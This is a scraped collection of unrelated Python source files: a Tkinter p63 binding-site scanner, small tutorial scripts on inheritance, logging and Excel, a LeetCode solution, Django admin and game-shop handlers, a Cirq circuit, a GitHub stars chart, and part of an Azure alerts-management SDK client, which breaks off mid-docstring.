for l in self.lists:
l.selection_clear(first, last)
def selection_includes(self, index):
return self.lists[0].selection_includes(index)
def selection_set(self, first, last=None):
for l in self.lists:
l.selection_set(first, last)
def _sort(self, e):
# get the listbox to sort by (mapped by the header button)
b=e.widget
col, direction = self.colmapping[b]
# get the entire table data into mem
tableData = self.get(0,END)
if self.origData == None:
import copy
self.origData = copy.deepcopy(tableData)
rowcount = len(tableData)
#remove old sort indicators if it exists
for btn in self.colmapping.keys():
lab = btn.cget('text')
if lab[0]=='[': btn.config(text=lab[4:])
btnLabel = b.cget('text')
#sort data based on direction
if direction==0:
tableData = self.origData
else:
if direction==1: b.config(text='[+] ' + btnLabel)
else: b.config(text='[-] ' + btnLabel)
# sort by col
def colsort(x, y, mycol=col, direction=direction):
return direction*cmp(x[mycol], y[mycol])
tableData.sort(colsort)
#clear widget
self.delete(0,END)
# refill widget
for row in range(rowcount):
self.insert(END, tableData[row])
# toggle direction flag
if(direction==1): direction=-1
else: direction += 1
self.colmapping[b] = (col, direction)
class StatusBar(Frame):
def __init__(self, master):
Frame.__init__(self, master)
self.label = Label(self, bd=1, relief=SUNKEN, anchor=W)
self.label.pack(fill=X)
def set(self, format, *args):
self.label.config(text=format % args)
self.label.update_idletasks()
def clear(self):
self.label.config(text="")
self.label.update_idletasks()
class App:
def open_fasta_file(self):
name = tkFileDialog.askopenfilename()
if name:
try:
self.f = Fasta(name)
self.loaded_file = os.path.split(name)[-1]
self.mlb.delete(0, self.mlb.size() - 1)
self.status.set("Loaded %s - %s" % (self.loaded_file, self.f))
self.scanmenu.entryconfig(0, state=NORMAL)
except:
tkMessageBox.showerror("Error opening file", "Error opening %s.\nIs it a valid FASTA file?" % os.path.split(name)[-1])
def save_results(self):
name = tkFileDialog.asksaveasfilename(filetypes=[("gff", "*.gff")], defaultextension=".gff")
if name:
f = open(name, "w")
for row in self.mlb.get(0, self.mlb.size() - 1):
f.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s %s %s\n" % (row[0], "p63scan", "p63bs", row[1], row[2], row[3], "+", ".", row[4], row[5], row[6]))
f.close()
self.status.set("p63scan results written to %s" % os.path.split(name)[-1])
def scan_file(self):
d = ScanDialog(self.master)
if d.scan_ok:
min_spacer = d.min_spacer
max_spacer = d.max_spacer
nreport = d.nreport
cutoffs = []
if d.defaults:
cutoffs = DEFAULT_CUTOFFS
elif d.cutoff:
cutoffs = (max_spacer - min_spacer + 1) * [d.cutoff]
d.destroy()
self.status.set("Scanning %s for p63 binding sites" % self.loaded_file)
self.mlb.delete(0, self.mlb.size() - 1)
count = 0
for (id,seq) in self.f.items():
result = scan(seq.upper(), PWM_LEFT, PWM_RIGHT, min_spacer, max_spacer, cutoffs, nreport)
for (score, pos, spacer, strand) in result:
count += 1
self.mlb.insert(END,(id, pos, pos + len(PWM_LEFT) + spacer + len(PWM_RIGHT), score,
seq[pos: pos + len(PWM_LEFT)],
seq[pos + len(PWM_LEFT): pos + len(PWM_LEFT) + spacer],
seq[pos + len(PWM_LEFT) + spacer: pos + len(PWM_LEFT) + spacer + len(PWM_RIGHT)]
))
self.status.set("Done scanning %s. Found %s binding sites." % (self.loaded_file, count))
self.filemenu.entryconfig(1, state=NORMAL)
def exit(self):
sys.exit()
def resize(self, event):
frame.pack()
def about(self):
tkMessageBox.showinfo("About %s" % NAME, DESCRIPTION)
def __init__(self, master):
# create a menu
self.master = master
master.title("p63scan")
menu = Menu(master)
master.config(menu=menu)
self.filemenu = Menu(menu,tearoff=0)
menu.add_cascade(label="File", menu=self.filemenu)
self.filemenu.add_command(label="Open Fastafile...", command=self.open_fasta_file)
self.filemenu.add_command(label="Save Results...", command=self.save_results)
self.filemenu.add_separator()
self.filemenu.add_command(label="Exit", command=self.exit)
self.filemenu.entryconfig(1, state=DISABLED)
self.scanmenu = Menu(menu,tearoff=0)
menu.add_cascade(label="Scan", menu=self.scanmenu)
self.scanmenu.add_command(label="Scan file", command=self.scan_file)
self.scanmenu.entryconfig(1, state=DISABLED)
helpmenu = Menu(menu,tearoff=0)
menu.add_cascade(label="Help", menu=helpmenu)
helpmenu.add_command(label="About...", command=self.about)
self.status = StatusBar(master)
self.status.pack(side=BOTTOM, fill=X)
self.status.set("No file loaded")
self.mlb = MultiListbox(master, (('id', 30), ('start', 4),('end',4), ('score', 4), ('left', 15), ('spacer', 10), ('right', 15)))
self.mlb.pack(expand=YES, fill=BOTH)
root = Tk()
app = App(root)
mainloop()
| [
"[email protected]"
] | |
ebd10a0a4af3d11227b8cc8c42118b2079ceeef1 | 31f56a696a0a5ada4aa2d583f8b340201696b3c7 | /nabu/neuralnetworks/classifiers/__init__.py | 42fc49fb14a326860f2012974c7b5b9d567b6e93 | [
"MIT"
] | permissive | DavidKarlas/nabu | 6d7fcdcd46f97b8886382079d04251b6862203db | fb530cf617ff86fe8a249d4582dfe90a303da295 | refs/heads/master | 2020-12-30T13:29:38.735236 | 2017-04-28T14:50:57 | 2017-04-28T14:50:57 | 91,229,041 | 1 | 0 | null | 2017-05-14T08:09:03 | 2017-05-14T08:09:03 | null | UTF-8 | Python | false | false | 172 | py | '''@package classifiers
Contains the neural net classifiers (e.g. dnn) and their components
(e.g. layers)
'''
from . import activation, classifier, layer, asr, lm
| [
"[email protected]"
] | |
73e5dbdc975e9d650c27382bce182c16f1722617 | a8f275638f6bab07644b6b6d2ff4a1eabc4a3b4b | /class-Animal.py | aba9a9201900ff4e823d33444234c6b42432f825 | [] | no_license | evamaina/OOP | 1bfd49706365f3d297f2383ffd995b2159ade283 | b1623cf76896c21a4ac49526070d8f4ebd3b90a8 | refs/heads/master | 2021-08-17T20:44:47.516263 | 2017-11-21T17:22:12 | 2017-11-21T17:22:12 | 107,859,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | """Inheritance provides a way to share functionality between classes.
This similarity can be expressed by making them all inherit from a superclass Animal,
which contains the shared functionality"""
class Animal:
def __init__(self, name, color):
self.name = name
self.color = color
class Cat(Animal):
def purr(self):
print("Purr...")
class Dog(Animal):
def bark(self):
print("Woof!")
fido = Dog("Fido", "brown")
print(fido.color)
fido.bark() | [
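# The same idea with the other subclass; the instance name and color are arbitrary.
felix = Cat("Felix", "black")
print(felix.name, felix.color)
felix.purr()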
"[email protected]"
] | |
f10d7333e8172120f845c6ba2d0052fc407fff29 | 2aa9432798d681a9a21535397bf3414d04bf014e | /test/loggingDemo.py | ec95bf2285c991a9c4e84eaa52b2932ef7680438 | [] | no_license | RaunakJalan/Selenium_Automation | babd426e9a12b3cfffe28a34af6486fcce57ce23 | 47d4faa275590b8f9c2d6922689275c13d3650c2 | refs/heads/master | 2023-03-14T14:42:40.308146 | 2021-03-09T16:29:16 | 2021-03-09T16:29:16 | 346,070,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | import logging
logging.basicConfig(filename="test.log",
format='%(asctime)s: %(levelname)s: %(message)s',
datefmt="%m/%d/%Y %I:%M:%S %p"
)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("This is a critical message")
| [
"[email protected]"
] | |
9eee040f0ac6b5d1d6039900ac3d403d046bf926 | cf7b827958166c8569eb58deb511cc3f07567741 | /in_Python_v2/1074 Number of Submatrices That Sum to Target.py | e3b4d58aa31bd7bded1a018b1d37e2c0dae32354 | [] | no_license | YangLiyli131/Leetcode2020 | e4e36eb36b1983f73b0e733455b4a7953dfebe6d | 20623defecf65cbc35b194d8b60d8b211816ee4f | refs/heads/master | 2023-08-22T06:00:55.924112 | 2021-09-18T19:04:15 | 2021-09-18T19:04:15 | 251,426,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 857 | py | from collections import defaultdict
class Solution(object):
def numSubmatrixSumTarget(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: int
"""
row, col = len(matrix), len(matrix[0])
ps = [[0] * (col + 1) for _ in range(row + 1)]
for i in range(1, row + 1):
for j in range(1, col + 1):
ps[i][j] = ps[i-1][j] + ps[i][j-1] - ps[i-1][j-1] + matrix[i-1][j-1]
res = 0
for r1 in range(1, row+1):
for r2 in range(r1, row+1):
h = defaultdict(int)
h[0] = 1
for c in range(1, col+1):
curs = ps[r2][c] - ps[r1-1][c]
res += h[curs - target]
h[curs] += 1
return res
| [
"[email protected]"
] | |
7601d4d19e420178a28cc601c74ab7d5147f8d3c | a6a2997ecc7dd8406f4e190d357cba1d301489c3 | /users/admin.py | 531bc47e3dd64703dae1fc4ae821ee05804a0ffb | [] | no_license | Shatki/itreactor | de306bd0a06d9b498645eeb76e191cfa70cdca04 | a657ad7fb4a9051f9ab845539a7369fe0da17d26 | refs/heads/master | 2023-02-21T15:29:00.840747 | 2021-01-28T05:37:15 | 2021-01-28T05:37:15 | 317,347,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,236 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.models import Group
from .forms import UserCreationForm, UserChangeForm
from .models import User, Feedback
@admin.register(User)
class UserAdmin(BaseUserAdmin):
model = User
# The forms to add and change user instances
form = UserChangeForm
add_form = UserCreationForm
list_display = (
'email',
'first_name',
'last_name',
'last_login')
list_filter = (
'date_joined',
'last_login',
)
readonly_fields = (
'date_joined',
'date_updated',
'last_login',
)
fieldsets = (
(None, {
'fields': (
'email',
'password',
)
}),
        (u'Персональная информация', {  # "Personal information"
'fields': (
'first_name',
'last_name',
'photo',
)
}),
        (u'Права доступа', {  # "Access permissions"
'fields': (
'groups',
'user_permissions',
'is_superuser',
'is_staff',
'is_active',
)
}),
        (u'Важные даты', {  # "Important dates"
'fields': (
'last_login',
'date_joined',
'date_updated',
)
}),
)
add_fieldsets = (
(None, {
'classes':
('wide',),
'fields': (
'email',
'password1',
'password2',
'is_superuser',
)
}),
)
search_fields = (
'email',)
ordering = (
'date_joined',)
filter_horizontal = (
'groups',
'user_permissions',
)
# Register your models here.
@admin.register(Feedback)
class FeedbackAdmin(admin.ModelAdmin):
list_display = ('name',
'date',
'email',
'subject',
'message',
)
search_fields = ('name',)
ordering = ('date',)
| [
"[email protected]"
] | |
a3de30095b503bfe0aca308080e3d8f013346b36 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p2DJ/New/program/cirq/startCirq407.py | 4cd57412338a48432208219d046554ef403b1008 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,268 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=2
# total number=20
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.Y.on(input_qubit[1])) # number=2
c.append(cirq.Y.on(input_qubit[1])) # number=4
c.append(cirq.Y.on(input_qubit[1])) # number=3
c.append(cirq.rx(2.0860175219836226).on(input_qubit[1])) # number=7
c.append(cirq.X.on(input_qubit[0])) # number=5
c.append(cirq.X.on(input_qubit[0])) # number=6
c.append(cirq.H.on(input_qubit[0])) # number=10
c.append(cirq.CZ.on(input_qubit[1],input_qubit[0])) # number=11
c.append(cirq.H.on(input_qubit[0])) # number=12
c.append(cirq.H.on(input_qubit[0])) # number=13
c.append(cirq.CZ.on(input_qubit[1],input_qubit[0])) # number=14
c.append(cirq.H.on(input_qubit[0])) # number=15
c.append(cirq.Y.on(input_qubit[0])) # number=16
c.append(cirq.Y.on(input_qubit[0])) # number=17
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=18
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=19
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq407.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | [
"[email protected]"
] | |
ddca45160dbe21af63be36d6a989d3787788a108 | 29145db13229d311269f317bf2819af6cba7d356 | /january circuits/equalSub.py | 379cf14defb37168832a4605de814de52080f970 | [] | no_license | rocket3989/hackerEarth2019 | 802d1ca6fd03e80657cbe07a3f123e087679af4d | 42c0a7005e52c3762496220136cc5c1ee93571bb | refs/heads/master | 2021-07-05T01:32:42.203964 | 2020-12-22T03:40:20 | 2020-12-22T03:40:20 | 211,607,143 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | N = int(input())
K = int(input())
A = [int(x) for x in input().split()]
maxOf = A[0]
l, r = 0, 1
sumEl = A[0]
maxLen = 1
while r < N + 1:
if sumEl + K < maxOf * (r - l):
sumEl -= A[l]
if A[l] == maxOf:
maxOf = max(A[l + 1:r])
l += 1
continue
maxLen = max(maxLen, r - l)
if r == N: break
maxOf = max(maxOf, A[r])
sumEl += A[r]
r += 1
print(maxLen) | [
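# How the window works, with a small worked example: the window [l, r) stays
# valid while raising every element in it to the window maximum costs at most K
# increments, i.e. maxOf * (r - l) - sumEl <= K. For instance, with N = 4,
# K = 3 and A = [1, 2, 2, 4], the best window is [1, 2, 2]
# (cost 2*3 - 5 = 1 <= 3), so the printed answer would be 3.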
"[email protected]"
] | |
198932798010531a6e5ee431ea85d0f3e5ca76b1 | c9642233f1de71f1a61ae28c695c2d9228825156 | /echecs_hall/app/views/mj_hall_api/good.py | 9ff47539c15f03ae8f000dca757f3e9985f69aac | [
"AFL-3.0"
] | permissive | obespoir/echecs | d8314cffa85c8dce316d40e3e713615e9b237648 | e4bb8be1d360b6c568725aee4dfe4c037a855a49 | refs/heads/master | 2022-12-11T04:04:40.021535 | 2020-03-29T06:58:25 | 2020-03-29T06:58:25 | 249,185,889 | 16 | 9 | null | null | null | null | UTF-8 | Python | false | false | 2,325 | py | # coding=utf-8
from app.views.base_handler import BaseHandler
from app.controller.mj_hall_controller import good_controller
from app.controller.mj_hall_controller import login_hall_controller
import json
from . import mj_hall
from app.share.error_code import *
import time
from app.extensions.common import md5
from tornado.web import authenticated
@mj_hall.route('/setgood')
class SetGood(BaseHandler):
def get(self):
print('good')
def post(self):
pass
@mj_hall.route('/getgood')
class GetGood(BaseHandler):
isLogin = True
tag = __name__
@authenticated
def get(self):
data = []
goods_list = good_controller.get_all_good_info()
        if not goods_list:
            self.return_data(NOT_GOODS, data)
for good in goods_list:
data.append({'id': good['id'], 'title': good['name'], 'rmb_price': good['rmb_price'],
'icon': good['icon'],
'selling_price': good['selling_price']})
self.return_success(data)
def post(self):
pass
@mj_hall.route('/buygood')
class BuyGood(BaseHandler):
isLogin = True
tag = __name__
@authenticated
def get(self):
param = json.loads(self.get_argument('base'))
sub_param = param['param']
good_id = int(self.get_param('id', sub_param))
        # get the current player's info
user = self.current_user
uid = int(user['uid'])
user_money = int(user['money'])
user_diamond = int(user['diamond'])
        # look up the good info by its id
        good_info = good_controller.get_good_info_by_id(good_id)
        # price of the good
        selling_price = int(good_info['selling_price'])
        # quantity granted by the good
        quantity = int(good_info['quantity'])
if not good_info:
self.return_error(PARAM_ERROR)
        # check whether the player has enough diamonds to buy this good
if user_diamond >= selling_price:
diamond = user_diamond - selling_price
money = user_money + quantity
data = {'diamond': diamond, 'money': money}
login_hall_controller.update_user_in_cache(uid, data)
self.return_success(data)
else:
self.return_error(NOT_ENOUGH_DIAMOND)
def post(self):
pass
| [
"[email protected]"
] | |
a40038fb0b6957d262599096d21a59dd2890bc91 | e526543920e4974504cb62802c393d5bc46559db | /python-repos/python_repos.py | cddc2b416e8f6a10ff5f96a8cd45f8641eb00818 | [] | no_license | mare-astrorum/python-crash-course-practice | b843f2067208b749558c4423556498e643c5fa42 | 47423808902b75af9d7888d4f9fa9f083bce88f4 | refs/heads/master | 2020-09-06T19:02:09.837740 | 2019-11-08T17:30:52 | 2019-11-08T17:30:52 | 220,516,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,580 | py | import requests
import sys
import pygal
from pygal.style import LightColorizedStyle as LCS, LightenStyle as LS
# Make an API call and store the response.
url = 'https://api.github.com/search/repositories?q=language:python&sort=stars'
r = requests.get(url)
print("Status code:", r.status_code)
# Store API response in a variable.
response_dict = r.json()
print("Total repositories:", response_dict['total_count'])
# Explore information about the repositories.
repo_dicts = response_dict['items']
print("Repositories returned:", len(repo_dicts))
names, plot_dicts = [], []
for repo_dict in repo_dicts:
names.append(repo_dict['name'])
non_bmp_map = dict.fromkeys(range(0x10000, sys.maxunicode + 1), 0xfffd)
description = repo_dict['description']
if description == None:
good_description = 'No description.'
else:
good_description = description.translate(non_bmp_map)
plot_dict = {
'value': repo_dict['stargazers_count'],
'label': good_description,
'xlink': repo_dict['html_url']
}
plot_dicts.append(plot_dict)
# Make visualization.
my_style = LS('#333366', base_style=LCS)
my_config = pygal.Config()
my_config.x_label_rotation = 45
my_config.show_legend = False
my_config.title_font_size = 24
my_config.label_font_size = 14
my_config.major_label_font_size = 18
my_config.show_y_guides = False
my_config.width = 1000
chart = pygal.Bar(my_config, style=my_style)
chart.title = 'Python Projects'
chart.x_labels = names
chart.add('', plot_dicts)
chart.render_to_file('example_outcome_python_repos.svg')
| [
"[email protected]"
] | |
e017100cb679bf6f1ae3e8f315b984bb2e457cfb | 6375b7e4dfe11ced7dcd3fad1a7a2de9a504910d | /excel/xlutils_demo.py | d4506129814db5dc73782bc3726332f7f72f039b | [] | no_license | yaowenqiang/lpthw | b65e6b8ce576e7caa5cfba5570550e546d1e0549 | 4bbd7ebb4e8c570a39bf9c55df9bd97e4f86e1e5 | refs/heads/master | 2020-04-01T10:57:32.959389 | 2019-05-01T09:27:25 | 2019-05-01T09:27:25 | 153,140,026 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | import xlwt
import xlrd
import xlutils
# open an existing excel file for reading
workbook = xlrd.open_workbook("myexclee.xls")
worksheet = workbook.sheet_by_index(0)
data = worksheet.cell_value(0,0)
# create a new excel workbook for writing
wb = xlwt.Workbook()
sh = wb.add_sheet('Sheet1')
sh.write(0,0,'data')
wb.save('myexcel.xls')
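
# xlutils is imported above but not exercised; its usual role (a sketch, assuming
# 'myexcel.xls' exists after the save above) is to copy an xlrd workbook into a
# writable xlwt one, edit it and save it again:
#
#     from xlutils.copy import copy
#     rb = xlrd.open_workbook('myexcel.xls', formatting_info=True)
#     wb2 = copy(rb)
#     wb2.get_sheet(0).write(1, 0, 'updated value')
#     wb2.save('myexcel_edited.xls')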
| [
"[email protected]"
] | |
0050e58aa4d71e43e495f50afeae7d51b46087dc | b457be31ac024f2a80ad553068544779d0680f48 | /dnawf/templates/clean_template.py | 5f1b01683a55986af6a84efe60413edbf363fd6e | [] | no_license | daxm/dnac-api-demo | 9ef0782b9d780aad7ece1112814dbe3a794d687c | dbf8432c84d9e47255b184310df69af48d1f1fee | refs/heads/master | 2022-11-03T14:42:26.021264 | 2020-06-16T20:00:32 | 2020-06-16T20:00:32 | 271,582,024 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,340 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from argparse import ArgumentParser
import glob
import os
import pprint
def clean_template(template):
    pprint.pprint(template)
# template.pop('id')
template.pop('createTime')
template.pop('lastUpdateTime')
template.pop('parentTemplateId')
template.pop("projectId")
template.pop("projectName")
# need to clean vars.
for var in template['templateParams']:
var.pop('id')
return template
def remove_dict_key(key, var):
    if hasattr(var, 'items'):
        if key in var:
            var.pop(key)
        for k, v in var.items():
if isinstance(v, dict):
for result in remove_dict_key(key, v):
yield result
elif isinstance(v, list):
for d in v:
for result in remove_dict_key(key, d):
yield result
def saveTemplate(template, orig_filename):
dir_name = os.path.dirname(orig_filename)
filename_extension = os.path.basename(orig_filename)
(basename, extension) = os.path.splitext(filename_extension)
out_f = open(dir_name + "/" + basename + "_clean" + extension, "a")
out_f.write(json.dumps(template, indent=4, sort_keys=True))
out_f.close()
def printTemplateContent(template):
print(100 * "#")
pprint.pprint(template)
print(100 * "#")
def removePreviousVersion(dir_name):
file_list = glob.glob(dir_name + "/*clean*")
# Iterate over the list of filepaths & remove each file.
for filePath in file_list:
try:
print("Deleting file : ", filePath)
os.remove(filePath)
except:
print("Error while deleting file : ", filePath)
if __name__ == "__main__":
parser = ArgumentParser(description='Select options.')
parser.add_argument('dir', help="directory where input json files are ")
args = parser.parse_args()
removePreviousVersion(args.dir)
for file_name in glob.glob(args.dir + "/*.json"):
print(file_name)
with open(file_name) as f:
template = json.load(f)
c_template = clean_template(template)
printTemplateContent(c_template)
saveTemplate(c_template, file_name)
| [
"[email protected]"
] | |
408abd329ed3059c69067f2e8937a82c4abe1a53 | 50948d4cb10dcb1cc9bc0355918478fb2841322a | /azure-mgmt-alertsmanagement/azure/mgmt/alertsmanagement/operations/alerts_operations.py | fd15f46bc8175cab9e2229c9c9919072c07c3b6a | [
"MIT"
] | permissive | xiafu-msft/azure-sdk-for-python | de9cd680b39962702b629a8e94726bb4ab261594 | 4d9560cfd519ee60667f3cc2f5295a58c18625db | refs/heads/master | 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 | MIT | 2020-10-02T01:17:02 | 2019-05-22T07:33:46 | Python | UTF-8 | Python | false | false | 27,563 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from .. import models
class AlertsOperations(object):
"""AlertsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: API version. Constant value: "2018-05-05".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2018-05-05"
self.config = config
def get_all(
self, target_resource=None, target_resource_type=None, target_resource_group=None, monitor_service=None, monitor_condition=None, severity=None, alert_state=None, alert_rule=None, smart_group_id=None, include_context=None, include_egress_config=None, page_count=None, sort_by=None, sort_order=None, select=None, time_range=None, custom_time_range=None, custom_headers=None, raw=False, **operation_config):
"""List all the existing alerts, where the results can be selective by
passing multiple filter parameters including time range and sorted on
specific fields. .
:param target_resource: Filter by target resource( which is full ARM
ID) Default value is select all.
:type target_resource: str
:param target_resource_type: Filter by target resource type. Default
value is select all.
:type target_resource_type: str
:param target_resource_group: Filter by target resource group name.
Default value is select all.
:type target_resource_group: str
:param monitor_service: Filter by monitor service which is the source
of the alert instance. Default value is select all. Possible values
include: 'Application Insights', 'ActivityLog Administrative',
'ActivityLog Security', 'ActivityLog Recommendation', 'ActivityLog
Policy', 'ActivityLog Autoscale', 'Log Analytics', 'Nagios',
'Platform', 'SCOM', 'ServiceHealth', 'SmartDetector', 'VM Insights',
'Zabbix'
:type monitor_service: str or
~azure.mgmt.alertsmanagement.models.MonitorService
:param monitor_condition: Filter by monitor condition which is the
state of the monitor(alertRule) at monitor service. Default value is
to select all. Possible values include: 'Fired', 'Resolved'
:type monitor_condition: str or
~azure.mgmt.alertsmanagement.models.MonitorCondition
        :param severity: Filter by severity. Default value is select all.
Possible values include: 'Sev0', 'Sev1', 'Sev2', 'Sev3', 'Sev4'
:type severity: str or ~azure.mgmt.alertsmanagement.models.Severity
:param alert_state: Filter by state of the alert instance. Default
value is to select all. Possible values include: 'New',
'Acknowledged', 'Closed'
:type alert_state: str or
~azure.mgmt.alertsmanagement.models.AlertState
:param alert_rule: Filter by alert rule(monitor) which fired alert
instance. Default value is to select all.
:type alert_rule: str
:param smart_group_id: Filter the alerts list by the Smart Group Id.
Default value is none.
:type smart_group_id: str
:param include_context: Include context which has data contextual to
         the monitor service. Default value is 'false'.
:type include_context: bool
:param include_egress_config: Include egress config which would be
used for displaying the content in portal. Default value is 'false'.
:type include_egress_config: bool
:param page_count: Determines number of alerts returned per page in
response. Permissible value is between 1 to 250. When the
"includeContent" filter is selected, maximum value allowed is 25.
Default value is 25.
:type page_count: int
:param sort_by: Sort the query results by input field, Default value
is 'lastModifiedDateTime'. Possible values include: 'name',
'severity', 'alertState', 'monitorCondition', 'targetResource',
'targetResourceName', 'targetResourceGroup', 'targetResourceType',
'startDateTime', 'lastModifiedDateTime'
:type sort_by: str or
~azure.mgmt.alertsmanagement.models.AlertsSortByFields
:param sort_order: Sort the query results order in either ascending or
descending. Default value is 'desc' for time fields and 'asc' for
others. Possible values include: 'asc', 'desc'
:type sort_order: str
        :param select: This filter allows selection of the fields (comma
         separated) which would be part of the essential section. This
would allow to project only the required fields rather than getting
entire content. Default is to fetch all the fields in the essentials
section.
:type select: str
:param time_range: Filter by time range by below listed values.
Default value is 1 day. Possible values include: '1h', '1d', '7d',
'30d'
:type time_range: str or ~azure.mgmt.alertsmanagement.models.TimeRange
:param custom_time_range: Filter by custom time range in the format
<start-time>/<end-time> where time is in (ISO-8601 format)'.
Permissible values is within 30 days from query time. Either
timeRange or customTimeRange could be used but not both. Default is
none.
:type custom_time_range: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Alert
:rtype:
~azure.mgmt.alertsmanagement.models.AlertPaged[~azure.mgmt.alertsmanagement.models.Alert]
:raises:
:class:`ErrorResponseException<azure.mgmt.alertsmanagement.models.ErrorResponseException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.get_all.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if target_resource is not None:
query_parameters['targetResource'] = self._serialize.query("target_resource", target_resource, 'str')
if target_resource_type is not None:
query_parameters['targetResourceType'] = self._serialize.query("target_resource_type", target_resource_type, 'str')
if target_resource_group is not None:
query_parameters['targetResourceGroup'] = self._serialize.query("target_resource_group", target_resource_group, 'str')
if monitor_service is not None:
query_parameters['monitorService'] = self._serialize.query("monitor_service", monitor_service, 'str')
if monitor_condition is not None:
query_parameters['monitorCondition'] = self._serialize.query("monitor_condition", monitor_condition, 'str')
if severity is not None:
query_parameters['severity'] = self._serialize.query("severity", severity, 'str')
if alert_state is not None:
query_parameters['alertState'] = self._serialize.query("alert_state", alert_state, 'str')
if alert_rule is not None:
query_parameters['alertRule'] = self._serialize.query("alert_rule", alert_rule, 'str')
if smart_group_id is not None:
query_parameters['smartGroupId'] = self._serialize.query("smart_group_id", smart_group_id, 'str')
if include_context is not None:
query_parameters['includeContext'] = self._serialize.query("include_context", include_context, 'bool')
if include_egress_config is not None:
query_parameters['includeEgressConfig'] = self._serialize.query("include_egress_config", include_egress_config, 'bool')
if page_count is not None:
query_parameters['pageCount'] = self._serialize.query("page_count", page_count, 'int')
if sort_by is not None:
query_parameters['sortBy'] = self._serialize.query("sort_by", sort_by, 'str')
if sort_order is not None:
query_parameters['sortOrder'] = self._serialize.query("sort_order", sort_order, 'str')
if select is not None:
query_parameters['select'] = self._serialize.query("select", select, 'str')
if time_range is not None:
query_parameters['timeRange'] = self._serialize.query("time_range", time_range, 'str')
if custom_time_range is not None:
query_parameters['customTimeRange'] = self._serialize.query("custom_time_range", custom_time_range, 'str')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.AlertPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.AlertPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
get_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AlertsManagement/alerts'}
def get_by_id(
self, alert_id, custom_headers=None, raw=False, **operation_config):
"""Get a specific alert.
Get information related to a specific alert.
:param alert_id: Unique ID of an alert instance.
:type alert_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
